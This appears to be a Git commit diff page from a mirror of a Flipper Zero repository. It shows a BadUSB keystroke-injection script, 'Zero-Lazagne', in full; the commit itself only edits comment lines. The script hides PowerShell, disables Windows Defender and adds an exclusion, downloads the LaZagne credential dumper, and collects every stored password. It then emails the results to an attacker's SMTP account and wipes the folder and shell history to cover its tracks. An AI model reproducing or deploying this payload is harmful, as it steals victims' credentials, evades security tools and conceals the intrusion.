neil/Flipper
1
0
Fork 0
mirror of https://github.com/UberGuidoZ/Flipper.git synced 2024-12-22 06:20:12 +00:00
Code Issues Packages Projects Releases Wiki Activity

Replaced spaces with REM to avoid issues

Browse Source
This commit is contained in:
UberGuidoZ 2022-10-29 23:25:48 -07:00 committed by GitHub
parent 14e9033438
commit 141607e608
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
BadUSB/Zero-Lazagne/Zero-Lazagne.txt
View File

@ -8,39 +8,39 @@ DELAY 2000
LEFT LEFT
ENTER ENTER
DELAY 1000 DELAY 1000
REM
REM Hide Powershell (Remember to extract Flipper only when it displays 100%) REM Hide Powershell (Remember to extract Flipper only when it displays 100%)
STRING PowerShell.exe -WindowStyle hidden STRING PowerShell.exe -WindowStyle hidden
ENTER ENTER
REM
REM Disable real time protection REM Disable real time protection
STRING Set-MpPreference -DisableRealtimeMonitoring $true STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER ENTER
REM
REM Create a tmp directory in Downloads folder REM Create a tmp directory in Downloads folder
STRING $dir = "C:\Users\$env:UserName\Downloads\tmp" STRING $dir = "C:\Users\$env:UserName\Downloads\tmp"
ENTER ENTER
STRING New-Item -ItemType Directory -Path $dir STRING New-Item -ItemType Directory -Path $dir
ENTER ENTER
REM
REM Add an exception to Windows Defender for the tmp directory REM Add an exception to Windows Defender for the tmp directory
STRING Add-MpPreference -ExclusionPath $dir STRING Add-MpPreference -ExclusionPath $dir
ENTER ENTER
REM
REM Hide the directory REM Hide the directory
STRING $hide = Get-Item $dir -Force STRING $hide = Get-Item $dir -Force
ENTER ENTER
STRING $hide.attributes='Hidden' STRING $hide.attributes='Hidden'
ENTER ENTER
REM
REM Download the executable (version 2.4.2 is a bit faster, you can change the download link to the latest version) REM Download the executable (version 2.4.2 is a bit faster, you can change the download link to the latest version)
STRING Invoke-WebRequest -Uri "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.2/lazagne.exe" -OutFile "$dir\lazagne.exe" STRING Invoke-WebRequest -Uri "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.2/lazagne.exe" -OutFile "$dir\lazagne.exe"
ENTER ENTER
REM
REM Execute lazagne.exe and save output to a file REM Execute lazagne.exe and save output to a file
STRING & "$dir\lazagne.exe" all > "$dir\output.txt" STRING & "$dir\lazagne.exe" all > "$dir\output.txt"
ENTER ENTER
REM
REM Mail Exfiltration REM Mail Exfiltration
STRING $smtp = "INSERT YOUR SMTP HERE" STRING $smtp = "INSERT YOUR SMTP HERE"
ENTER ENTER
@ -56,11 +56,11 @@ STRING $Password = "INSERT YOUR PASSWORD HERE" | ConvertTo-SecureString -AsPlain
ENTER ENTER
STRING $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $From, $Password STRING $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $From, $Password
ENTER ENTER
REM
REM Send the mail. Tested without SSl. You can try to add "-Use Ssl" and change the port (465 or 587 based on your SMTP) REM Send the mail. Tested without SSl. You can try to add "-Use Ssl" and change the port (465 or 587 based on your SMTP)
STRING Send-MailMessage -From $From -To $To -Subject $Subject -Body $Body -Attachments "$dir\output.txt" -SmtpServer $smtp -port 25 -Credential $Credential STRING Send-MailMessage -From $From -To $To -Subject $Subject -Body $Body -Attachments "$dir\output.txt" -SmtpServer $smtp -port 25 -Credential $Credential
ENTER ENTER
REM
REM Clean up REM Clean up
STRING Remove-Item -Path $dir -Recurse -Force STRING Remove-Item -Path $dir -Recurse -Force
ENTER ENTER
@ -68,7 +68,7 @@ STRING Set-MpPreference -DisableRealtimeMonitoring $false
ENTER ENTER
STRING Remove-MpPreference -ExclusionPath $dir STRING Remove-MpPreference -ExclusionPath $dir
ENTER ENTER
REM
REM Remove the script from the system and exit from powershell REM Remove the script from the system and exit from powershell
STRING Clear-History STRING Clear-History
ENTER ENTER